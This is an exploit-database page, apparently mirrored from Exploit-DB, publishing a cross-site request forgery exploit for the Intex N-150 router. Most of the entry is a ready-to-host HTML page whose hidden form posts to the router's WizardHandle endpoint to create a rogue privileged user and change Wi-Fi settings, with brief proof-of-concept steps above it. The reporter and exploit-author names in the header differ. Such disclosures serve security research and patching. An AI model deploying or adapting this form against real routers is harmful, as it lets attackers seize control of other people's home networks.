Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Intex Router N-150 - Cross-Site Request Forgery (Add Admin)

🗓️ 25 Jun 2018 00:00:00Reported by Samrat DasType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 63 Views

Intex N-150 Router CSRF Vulnerability - Add Admi

Code
# Exploit Title:​​ Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-23
# Exploit Author: Navina Asrani
# Version: N-150
# CVE : N/A
# Category: Router Firmware

# 1. Description
# The firmware allows malicious request to be executed without verifying
# source of request. This leads to arbitrary execution with malicious request
# which will lead to the creation of a privileged user..

# 2. Proof of Concept
# Visit the application
# Go to any router setting modification page and change the values,
# create a request and observe the lack of CSRF tokens.
# Craft an html page with all the details for the built-in admin
# user creation and host it on a server
# Upon the link being clicked by a logged in admin user,
# immediately, the action will get executed
# Exploitation Technique: A attacker can create a rogue admin user to gain
# access to the application.

# Exploit code:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.0.1/goform/WizardHandle" method="POST">
      <input type="hidden" name="GO" value="index&#46;asp" />
      <input type="hidden" name="v12&#95;time" value="1529768448&#46;425" />
      <input type="hidden" name="WANT1" value="3" />
      <input type="hidden" name="isp" value="3" />
      <input type="hidden" name="PUN" value="testuser&#95;k" />
      <input type="hidden" name="PPW" value="123456" />
      <input type="hidden" name="SSID" value="testwifiap" />
      <input type="hidden" name="wirelesspassword" value="00000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2018 00:00Current
7.4High risk
Vulners AI Score7.4
intex routercross-site request forgeryadd adminfirmwareexploitattackercsrf tokensrogue admin user
63